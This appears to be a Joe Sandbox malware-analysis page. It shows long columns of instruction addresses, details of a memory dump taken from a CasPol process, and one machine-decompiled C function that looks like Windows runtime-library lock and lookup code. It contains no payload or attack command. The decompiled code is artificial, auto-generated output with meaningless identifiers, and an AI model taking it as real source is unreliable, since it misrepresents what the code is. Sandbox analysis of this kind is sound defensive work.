                                                                  0x00000000
                                                                  0x014141da
                                                                  0x014141da
                                                                  0x014141df
                                                                  0x014141e4
                                                                  0x014141ec
                                                                  0x01414203
                                                                  0x01414207
                                                                  0x0145e1fd
                                                                  0x01414222
                                                                  0x01414226
                                                                  0x0145e1f3
                                                                  0x0145e1f3
                                                                  0x0141422c
                                                                  0x0141422c
                                                                  0x01414233
                                                                  0x0145e1ed
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01414239
                                                                  0x01414239
                                                                  0x01414239
                                                                  0x01414239
                                                                  0x01414233
                                                                  0x01414226
                                                                  0x014141ee
                                                                  0x014141ee
                                                                  0x014141f4
                                                                  0x01414575
                                                                  0x0145e1b1
                                                                  0x0145e1b1
                                                                  0x00000000
                                                                  0x0141457b
                                                                  0x0141457b
                                                                  0x01414582
                                                                  0x0145e1ab
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01414588
                                                                  0x01414588
                                                                  0x0141458c
                                                                  0x0145e1c4
                                                                  0x0145e1c4
                                                                  0x00000000
                                                                  0x01414592
                                                                  0x01414592
                                                                  0x01414599
                                                                  0x0145e1be
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0141459f
                                                                  0x0141459f
                                                                  0x014145a3
                                                                  0x0145e1d7
                                                                  0x0145e1e4
                                                                  0x00000000
                                                                  0x014145a9
                                                                  0x014145a9
                                                                  0x014145b0
                                                                  0x0145e1d1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014145b6
                                                                  0x014145b6
                                                                  0x014145b6
                                                                  0x00000000
                                                                  0x014145b6
                                                                  0x014145b0
                                                                  0x014145a3
                                                                  0x01414599
                                                                  0x0141458c
                                                                  0x01414582
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014141f4
                                                                  0x0141423e
                                                                  0x01414241
                                                                  0x014145c0
                                                                  0x014145c4
                                                                  0x00000000
                                                                  0x014145ca
                                                                  0x014145ca
                                                                  0x00000000
                                                                  0x0145e207
                                                                  0x0145e20f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014145d1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014145ca
                                                                  0x00000000
                                                                  0x01414247
                                                                  0x01414247
                                                                  0x01414247
                                                                  0x01414249
                                                                  0x01414249
                                                                  0x01414249
                                                                  0x01414251
                                                                  0x01414251
                                                                  0x01414257
                                                                  0x0141425f
                                                                  0x0141426e
                                                                  0x01414270
                                                                  0x0141427a
                                                                  0x0145e219
                                                                  0x0145e219
                                                                  0x01414280
                                                                  0x01414282
                                                                  0x01414456
                                                                  0x014145ea
                                                                  0x00000000
                                                                  0x014145f0
                                                                  0x0145e223
                                                                  0x00000000
                                                                  0x0145e223
                                                                  0x0141445c
                                                                  0x0141445c
                                                                  0x00000000
                                                                  0x0141445c
                                                                  0x00000000
                                                                  0x01414288
                                                                  0x0141428c
                                                                  0x0145e298
                                                                  0x01414292
                                                                  0x01414292
                                                                  0x0141429e
                                                                  0x014142a3
                                                                  0x014142a7
                                                                  0x014142ac
                                                                  0x0145e22d
                                                                  0x014142b2
                                                                  0x014142b2
                                                                  0x014142b9
                                                                  0x014142bc
                                                                  0x014142c2
                                                                  0x014142ca
                                                                  0x014142cd
                                                                  0x014142cd
                                                                  0x014142d4
                                                                  0x0141433f
                                                                  0x0141433f
                                                                  0x014142d6
                                                                  0x014142d6
                                                                  0x014142d9
                                                                  0x014142dd
                                                                  0x014142eb
                                                                  0x0145e23a
                                                                  0x014142f1
                                                                  0x01414305
                                                                  0x0141430d
                                                                  0x01414315
                                                                  0x01414318
                                                                  0x0141431f
                                                                  0x01414322
                                                                  0x0141432e
                                                                  0x0141433b
                                                                  0x0141433b
                                                                  0x00000000
                                                                  0x0141432e
                                                                  0x014142eb
                                                                  0x0141434c
                                                                  0x0141434e
                                                                  0x01414352
                                                                  0x01414359
                                                                  0x0141435e
                                                                  0x01414361
                                                                  0x0141436e
                                                                  0x0141438a
                                                                  0x0141438e
                                                                  0x01414396
                                                                  0x0141439e
                                                                  0x014143a1
                                                                  0x014143ad
                                                                  0x014143bb
                                                                  0x014143bb
                                                                  0x014143ad
                                                                  0x0141436e
                                                                  0x014143bf
                                                                  0x014143c5
                                                                  0x01414463
                                                                  0x01414463
                                                                  0x014143ce
                                                                  0x014143d5
                                                                  0x014143d9
                                                                  0x014143df
                                                                  0x01414475
                                                                  0x01414479
                                                                  0x01414491
                                                                  0x01414491
                                                                  0x01414479
                                                                  0x014143e5
                                                                  0x014143eb
                                                                  0x014143f4
                                                                  0x014143f6
                                                                  0x014143f9
                                                                  0x014143fc
                                                                  0x014143ff
                                                                  0x014144e8
                                                                  0x014144ed
                                                                  0x014144f3
                                                                  0x0145e247
                                                                  0x00000000
                                                                  0x014144f9
                                                                  0x01414504
                                                                  0x01414508
                                                                  0x0141450f
                                                                  0x0145e269
                                                                  0x00000000
                                                                  0x01414515
                                                                  0x01414519
                                                                  0x01414531
                                                                  0x01414534
                                                                  0x01414537
                                                                  0x0141453e
                                                                  0x01414541
                                                                  0x0141454a
                                                                  0x0145e255
                                                                  0x0145e255
                                                                  0x0145e25b
                                                                  0x0145e25e
                                                                  0x0145e261
                                                                  0x0145e261
                                                                  0x01414555
                                                                  0x01414559
                                                                  0x0141455d
                                                                  0x0145e26d
                                                                  0x0145e270
                                                                  0x0145e274
                                                                  0x0145e27a
                                                                  0x0145e27d
                                                                  0x0145e28e
                                                                  0x0145e28e
                                                                  0x01414563
                                                                  0x01414563
                                                                  0x01414569
                                                                  0x01414569
                                                                  0x00000000
                                                                  0x0141455d
                                                                  0x0141450f
                                                                  0x00000000
                                                                  0x014144f3
                                                                  0x014143ff
                                                                  0x01414405
                                                                  0x01414405
                                                                  0x01414405
                                                                  0x014142ac
                                                                  0x0141428c
                                                                  0x01414282
                                                                  0x01414407
                                                                  0x0141440d
                                                                  0x0145e2af
                                                                  0x0145e2af
                                                                  0x01414413
                                                                  0x01414413
                                                                  0x00000000
                                                                  0x014141d4
                                                                  0x00000000
                                                                  0x014141c3
                                                                  0x014141bd
                                                                  0x01414415
                                                                  0x01414415
                                                                  0x01414416
                                                                  0x01414417
                                                                  0x01414429
                                                                  0x0141416e
                                                                  0x0141416e
                                                                  0x01414175
                                                                  0x01414498
                                                                  0x0141449f
                                                                  0x0145e12d
                                                                  0x00000000
                                                                  0x0145e133
                                                                  0x00000000
                                                                  0x0145e133
                                                                  0x014144a5
                                                                  0x014144a5
                                                                  0x014144aa
                                                                  0x00000000
                                                                  0x014144bb
                                                                  0x014144ca
                                                                  0x014144d6
                                                                  0x014144d7
                                                                  0x014144d8
                                                                  0x014144e3
                                                                  0x014144e3
                                                                  0x014144aa
                                                                  0x0141417b
                                                                  0x0141417b
                                                                  0x0141417b
                                                                  0x00000000
                                                                  0x0141417b
                                                                  0x01414175
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f3198d323829d69ea0d2af0ca3e169d0752b8d57147e5ccac8ef9f8c2de6ca3b
                                                                  • Instruction ID: 26496bfcbf3c3d1dc19182e97972b31d9ea6d3d3146586d54bf346c6b5cf4ccc
                                                                  • Opcode Fuzzy Hash: f3198d323829d69ea0d2af0ca3e169d0752b8d57147e5ccac8ef9f8c2de6ca3b
                                                                  • Instruction Fuzzy Hash: F0F16C706082118BD764CF59C480A7BB7E1EF98754F18492FF986CB3A5E734D982CB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014220A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 92%
                                                                  			E014220A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x14e8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = L01422EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = L01422EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E013F58EC(_t240);
									_t221 =  *0x14e5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x14e5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01434A2C(0x14e6e40, 0x1434b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01417D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x13d5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = L0142F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = L0142F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01477016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01412400(_t267 + 0x20);
															}
															L01412400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01422397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01412280(_t134, 0x14e8608);
									__eflags =  *0x14e6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										L0140FFB0(_t198, _t241, 0x14e8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x14e6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x14e8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01426B90(_t210,  &_v64);
										_t262 =  *0x14e8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0142E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										L014397C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0143006A(0x14e8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x14e8608);
												E0143B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x14e6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x14e6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								L0140FFB0(_t198, _t240, 0x14e8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E014300C2(0x14e8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                  0x014220a0
                                                                  0x014220a8
                                                                  0x014220ad
                                                                  0x014220b3
                                                                  0x014220b8
                                                                  0x014220c2
                                                                  0x014220c7
                                                                  0x014220cb
                                                                  0x014220d2
                                                                  0x01422263
                                                                  0x01422266
                                                                  0x01465836
                                                                  0x01465836
                                                                  0x00000000
                                                                  0x0142226c
                                                                  0x0142226c
                                                                  0x01422270
                                                                  0x01422274
                                                                  0x014220e2
                                                                  0x014220e2
                                                                  0x014220e6
                                                                  0x014220ee
                                                                  0x014657dc
                                                                  0x014657de
                                                                  0x014657ec
                                                                  0x014657ec
                                                                  0x014657f1
                                                                  0x014657f3
                                                                  0x014657f8
                                                                  0x00000000
                                                                  0x014657f8
                                                                  0x014657e0
                                                                  0x014657e4
                                                                  0x014657ea
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014657ea
                                                                  0x014220f4
                                                                  0x014220f4
                                                                  0x014220f8
                                                                  0x014220f8
                                                                  0x014220fc
                                                                  0x01422100
                                                                  0x01422106
                                                                  0x01422201
                                                                  0x01422206
                                                                  0x0142220b
                                                                  0x0142220e
                                                                  0x014222a9
                                                                  0x014222ac
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014222b2
                                                                  0x014222b5
                                                                  0x01465801
                                                                  0x01465806
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01465810
                                                                  0x01465815
                                                                  0x01465818
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0146581e
                                                                  0x014222bb
                                                                  0x014222bb
                                                                  0x01422218
                                                                  0x01422218
                                                                  0x0142221c
                                                                  0x01422220
                                                                  0x01422222
                                                                  0x014222c2
                                                                  0x014222c4
                                                                  0x014222dc
                                                                  0x014222dc
                                                                  0x014222e1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014222e7
                                                                  0x014222c8
                                                                  0x014222cd
                                                                  0x014222d3
                                                                  0x014222d6
                                                                  0x01465823
                                                                  0x01465825
                                                                  0x01465827
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0146582d
                                                                  0x00000000
                                                                  0x0146582d
                                                                  0x00000000
                                                                  0x01422228
                                                                  0x01422228
                                                                  0x00000000
                                                                  0x01422228
                                                                  0x01422222
                                                                  0x01422214
                                                                  0x01422214
                                                                  0x00000000
                                                                  0x01422114
                                                                  0x01422114
                                                                  0x01422114
                                                                  0x0142211a
                                                                  0x0142211c
                                                                  0x01422348
                                                                  0x0142234d
                                                                  0x01465840
                                                                  0x01465845
                                                                  0x01465848
                                                                  0x0146584e
                                                                  0x0146584e
                                                                  0x01465848
                                                                  0x01422353
                                                                  0x01422355
                                                                  0x01422388
                                                                  0x01422388
                                                                  0x01422368
                                                                  0x0142236a
                                                                  0x0142236c
                                                                  0x0142238f
                                                                  0x00000000
                                                                  0x0142236e
                                                                  0x0142236e
                                                                  0x0142218e
                                                                  0x0142218e
                                                                  0x01422191
                                                                  0x01422195
                                                                  0x01465a03
                                                                  0x01465a06
                                                                  0x01465a0c
                                                                  0x01465a0f
                                                                  0x01465a11
                                                                  0x01465a13
                                                                  0x01465a13
                                                                  0x01465a19
                                                                  0x01465a1f
                                                                  0x00000000
                                                                  0x0142219b
                                                                  0x0142219b
                                                                  0x014221a0
                                                                  0x01422282
                                                                  0x01422284
                                                                  0x01422284
                                                                  0x01422284
                                                                  0x01422284
                                                                  0x014221a6
                                                                  0x014221a9
                                                                  0x014221ac
                                                                  0x014221ae
                                                                  0x014221b3
                                                                  0x0142228b
                                                                  0x01422290
                                                                  0x01422379
                                                                  0x01422296
                                                                  0x01422298
                                                                  0x01422298
                                                                  0x01422290
                                                                  0x014221b9
                                                                  0x014221be
                                                                  0x014222a2
                                                                  0x014222a2
                                                                  0x014221c4
                                                                  0x014221c8
                                                                  0x014221cc
                                                                  0x014221d0
                                                                  0x014221d4
                                                                  0x014221de
                                                                  0x014221e3
                                                                  0x01465a29
                                                                  0x01465a2c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01465a3b
                                                                  0x00000000
                                                                  0x014221e9
                                                                  0x014221e9
                                                                  0x014221e9
                                                                  0x014221ee
                                                                  0x014221f1
                                                                  0x01465a45
                                                                  0x01465a4b
                                                                  0x01465a52
                                                                  0x01465a58
                                                                  0x01465a5d
                                                                  0x01465a5f
                                                                  0x01465a71
                                                                  0x01465a61
                                                                  0x01465a6a
                                                                  0x01465a6a
                                                                  0x01465a76
                                                                  0x01465a79
                                                                  0x01465a7f
                                                                  0x01465a83
                                                                  0x01465a85
                                                                  0x01465a87
                                                                  0x01465a87
                                                                  0x01465a8c
                                                                  0x01465a91
                                                                  0x01465a97
                                                                  0x01465a9f
                                                                  0x01465aa0
                                                                  0x01465aa1
                                                                  0x01465aa6
                                                                  0x01465aab
                                                                  0x01465ab1
                                                                  0x01465ab3
                                                                  0x01465ab9
                                                                  0x01465aca
                                                                  0x01465ad4
                                                                  0x01465ad4
                                                                  0x01465ade
                                                                  0x01465ade
                                                                  0x01465aab
                                                                  0x01465a79
                                                                  0x01465a52
                                                                  0x014221f7
                                                                  0x014221f9
                                                                  0x014221fe
                                                                  0x014221fe
                                                                  0x014221e3
                                                                  0x01422195
                                                                  0x0142236c
                                                                  0x01422122
                                                                  0x01422122
                                                                  0x01422124
                                                                  0x01422231
                                                                  0x01422236
                                                                  0x01422236
                                                                  0x01422238
                                                                  0x01422238
                                                                  0x01422240
                                                                  0x01422242
                                                                  0x01422244
                                                                  0x014659fc
                                                                  0x0142218c
                                                                  0x0142218c
                                                                  0x00000000
                                                                  0x0142218c
                                                                  0x0142224a
                                                                  0x0142224f
                                                                  0x01422256
                                                                  0x01422304
                                                                  0x01422309
                                                                  0x0142230f
                                                                  0x0142231e
                                                                  0x0142231e
                                                                  0x0142231e
                                                                  0x01422320
                                                                  0x01422325
                                                                  0x0142232a
                                                                  0x0142232c
                                                                  0x0142233e
                                                                  0x0142233e
                                                                  0x00000000
                                                                  0x0142232c
                                                                  0x01422311
                                                                  0x01422317
                                                                  0x0142231a
                                                                  0x0142231c
                                                                  0x01422380
                                                                  0x01422380
                                                                  0x01422380
                                                                  0x01422384
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01422386
                                                                  0x00000000
                                                                  0x0142231c
                                                                  0x0142225c
                                                                  0x0142225c
                                                                  0x00000000
                                                                  0x0142225c
                                                                  0x0142212a
                                                                  0x01422134
                                                                  0x01422138
                                                                  0x0142213d
                                                                  0x01465858
                                                                  0x01465863
                                                                  0x01465863
                                                                  0x01465867
                                                                  0x0146586a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0146586c
                                                                  0x0146586c
                                                                  0x01465871
                                                                  0x01465875
                                                                  0x01465877
                                                                  0x01465997
                                                                  0x0146599c
                                                                  0x014659a1
                                                                  0x014659a7
                                                                  0x014659a7
                                                                  0x00000000
                                                                  0x014659a7
                                                                  0x0146587d
                                                                  0x00000000
                                                                  0x0146588b
                                                                  0x0146588b
                                                                  0x01465890
                                                                  0x01465892
                                                                  0x01465894
                                                                  0x01465899
                                                                  0x0146589b
                                                                  0x014658a0
                                                                  0x014658a0
                                                                  0x014658aa
                                                                  0x014658b2
                                                                  0x014658b6
                                                                  0x014658be
                                                                  0x014658c6
                                                                  0x014658c9
                                                                  0x0146590d
                                                                  0x01465917
                                                                  0x0146591a
                                                                  0x0146591c
                                                                  0x01465920
                                                                  0x01465928
                                                                  0x0146592a
                                                                  0x0146592c
                                                                  0x0146592e
                                                                  0x0146592e
                                                                  0x014658cb
                                                                  0x014658cd
                                                                  0x014658d8
                                                                  0x014658e0
                                                                  0x014658f4
                                                                  0x014658fe
                                                                  0x014658fe
                                                                  0x0146593a
                                                                  0x0146593e
                                                                  0x01465940
                                                                  0x01465942
                                                                  0x00000000
                                                                  0x01465944
                                                                  0x01465944
                                                                  0x01465949
                                                                  0x0146594e
                                                                  0x0146594e
                                                                  0x01465953
                                                                  0x0146595b
                                                                  0x01465976
                                                                  0x01465976
                                                                  0x0146597a
                                                                  0x0146597f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01465981
                                                                  0x01465981
                                                                  0x01465981
                                                                  0x01465983
                                                                  0x01465988
                                                                  0x0146598d
                                                                  0x01465991
                                                                  0x01465991
                                                                  0x00000000
                                                                  0x0146595d
                                                                  0x0146595d
                                                                  0x01465963
                                                                  0x01465965
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01465967
                                                                  0x01465967
                                                                  0x0146596b
                                                                  0x0146596d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0146596f
                                                                  0x01465971
                                                                  0x01465971
                                                                  0x01465974
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01465974
                                                                  0x00000000
                                                                  0x01465967
                                                                  0x0146595b
                                                                  0x01465942
                                                                  0x01465863
                                                                  0x01422143
                                                                  0x01422143
                                                                  0x01422149
                                                                  0x0142214f
                                                                  0x014222f1
                                                                  0x014222f6
                                                                  0x00000000
                                                                  0x01422173
                                                                  0x01422173
                                                                  0x0142217d
                                                                  0x01422181
                                                                  0x01422186
                                                                  0x014659ae
                                                                  0x014659b2
                                                                  0x014659b5
                                                                  0x014659b7
                                                                  0x014659ba
                                                                  0x014659cd
                                                                  0x014659d1
                                                                  0x014659d5
                                                                  0x014659d9
                                                                  0x014659db
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014659dd
                                                                  0x014659dd
                                                                  0x014659e1
                                                                  0x014659e4
                                                                  0x014659e7
